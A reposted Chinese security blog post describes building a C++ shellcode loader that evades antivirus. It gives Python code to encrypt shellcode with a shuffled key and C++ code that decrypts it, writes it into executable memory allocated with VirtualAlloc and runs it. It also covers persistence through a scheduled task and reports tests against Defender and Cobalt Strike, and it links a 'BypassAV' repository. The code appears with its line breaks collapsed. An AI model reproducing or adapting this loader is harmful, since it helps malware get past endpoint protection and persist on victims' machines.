看到师傅们不停的分享各种免杀的思路,收获颇多,学习总结之余也做了练习,最终实现了主流杀毒的免杀处理。
这里主要分享一下免杀思路,没有什么技术性。
shellcode加载器顾名思义就是通过申请内存、把shellcode放入内存来加载shellcode。
没有经过加密的shellcode做的免杀会直接被杀,所以就要对shellcode先进行一些加密处理后,然后通过本地或远程加载shellcode,在加载器程序中解密shellcode后写入申请的内存中即可。
shellcode的加载器大致流程下图所示:
用Python自写加密算法通过随机密码进行加密,部分代码如下:shellcode加密函数
def encrypt2(srcStr,password):arr = srcStr.split(',0x')for i in range(1,len(arr)):arr[i]=int(arr[i],16)tempStr = ""for index in range(len(str(arr[i]))):tempStr=tempStr+password[int(str(arr[i])[index])]arr[i]=str(len(tempStr))+tempStrreturn ''.join(arr)
def shuffle_str(s):str_list = list(s)shuffle(str_list)return ''.join(str_list)passwd=shuffle_str('7032614895')
jm =passwd+encrypt2(jm, passwd)附一个加密后的shellcode图:
部分代码如下:
提取加密后的shellcode及加密密码
char str[] = ""string str1(str);//密码string passwd1 = str1.substr(0, 10);//shellcodestring shellcode1 = str1.substr(10, str1.length());const char* shellcode2 = shellcode1.data();
int k = 0;for (int i = 0; i < shellcode1.length(); i++){int len1;len1 = shellcode2[i] - 48;string dange = "";for (int j = 0; j < len1; j++){string a = to_string(shellcode2[i + j + 1] - 48);int a1 = passwd1.find(a);string a2 = to_string(a1);dange.append(a2);}i = i + len1;int dange4 = std::stoi(dange);ss[k] = *((char*)&dange4);k = k + 1;}
申请内存,把shellcode放入内存执行,此处使用自定义defer函数改变执行顺序(defer为Go自带函数):
LPVOID Memory = VirtualAlloc(NULL, sizeof(ss), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);defer(((void(*)())Memory)(););defer(memcpy(Memory, ss, sizeof(ss)););defer(if (Memory == NULL) { return 1; });
这里自行参考微软官方Demo,通过C++调用com组件 ITaskService,来实现免杀权限维持的功能。
添加成功效果图如下:
主流杀软静态查杀:
CS命令执行测试:
win11 Defender测试:
print("没有长久的规避技术,免杀只是与反病毒技术的长久对抗。")参考链接:
https://docs.microsoft.com/zh-cn/windows/win32/taskschd/logon-trigger-example--c---
项目地址(求star):
https://github.com/G73st/BypassAV
监制:船长、铁子 策划:格纸 文案:G73st 美工:青柠
原文始发于微信公众号(千寻安服):千寻笔记:C++免杀记
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论